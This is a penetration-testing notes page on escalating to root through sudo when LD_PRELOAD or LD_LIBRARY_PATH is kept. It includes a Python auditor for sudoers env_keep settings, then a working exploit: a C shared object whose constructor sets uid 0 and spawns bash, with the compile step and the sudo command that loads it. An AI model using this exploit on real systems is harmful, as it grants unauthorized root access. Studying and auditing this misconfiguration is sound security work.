# Sudo Privilege Escalation by Overriding Shared Library

### [LD\_PRELOAD, LD\_LIBRARY\_PATH Overwriting](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#ld_preload%2C-ld_library_path-overwriting)

#### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#investigation)

Check which commands the current user may run with sudo.

```sh
sudo -l
```

Below is an example of the output.

```bash
env_keep+=LD_PRELOAD

(ALL : ALL) NOPASSWD: somecmd
```

If the output shows that sudo keeps the **LD\_PRELOAD** environment variable, we can set this variable to load our custom shared object and escalate privileges.

We can also use **LD\_LIBRARY\_PATH** in place of **LD\_PRELOAD**.

To list the shared libraries an executable requires, use the `ldd` command.

```sh
ldd somecmd
```
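
The same `env_keep` condition can be audited from the administrator's side. The following is an added example, not code from the original page: it scans sudoers text or `sudo -l` output and reports whether **LD\_PRELOAD** or **LD\_LIBRARY\_PATH** ends up in the effective `env_keep` list. It goes beyond the single line shown above by also handling the `=`, `+=` and `-=` operators, quoted lists, `*` wildcards and backslash continuations; the function name and sample text are assumptions made for illustration.

```python
import fnmatch
import re

# Dynamic-linker variables named on this page.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")

# env_keep takes =, += or -= and either a quoted, space-separated list or one bare word.
ENV_KEEP = re.compile(r'env_keep\s*(\+=|-=|=)\s*("[^"]*"|[^\s,]+)')


def kept_loader_vars(text):
    """Return {variable: line that keeps it} after applying every env_keep
    operation in order. Scoped Defaults (Defaults:user, Defaults@host) are
    treated as global, so the result over-reports rather than under-reports."""
    text = text.replace("\\\n", " ")           # join backslash continuations
    patterns = {}                              # env_keep pattern -> source line
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments
        for op, value in ENV_KEEP.findall(line):
            # Entries may be NAME or NAME=value; only the name decides a match.
            names = [v.split("=", 1)[0] for v in value.strip('"').split()]
            if op == "=":
                patterns = {}                  # plain = replaces the whole list
            for name in names:
                if op == "-=":
                    patterns.pop(name, None)
                else:
                    patterns[name] = line
    hits = {}
    for var in LOADER_VARS:
        for pat, src in patterns.items():
            if fnmatch.fnmatchcase(var, pat):  # env_keep entries may use * wildcards
                hits[var] = src
                break
    return hits


# Constructed sample: the env_keep line from this page plus sudoers-style variants.
SAMPLE = '''\
Defaults env_reset, env_keep+=LD_PRELOAD
# Defaults env_keep += "LD_LIBRARY_PATH"
Defaults env_keep += "LANG LC_* \\
    LD_LIBRARY_PATH"
Defaults env_keep -= LD_PRELOAD
'''

if __name__ == "__main__":
    for var, src in kept_loader_vars(SAMPLE).items():
        print(f"[!] {var} survives sudo's environment reset: {src}")
```

Included files are not followed, so pass the function the contents of each sudoers file separately.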

#### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-privilege-escalation-by-overriding-shared-library/#exploitation)

First, create **exploit.c** under **/tmp**.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void inject()__attribute__((constructor));

void inject() {
	unsetenv("LD_PRELOAD");
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
```

* The **"constructor"** attribute is a GCC function attribute. A function marked with it is called automatically before the main function; in a shared object, it runs when the library is loaded.

Now compile the C program into a shared object.

```bash
# -fPIC: Generate Position Independent Code.
# -shared: Generate a shared library.
# -o: Output shared object.
gcc -fPIC -shared -o exploit.so exploit.c
```

Run the permitted command with **LD\_PRELOAD** set to the shared library; this spawns a root shell.

```bash
sudo LD_PRELOAD=/tmp/exploit.so somecmd
```


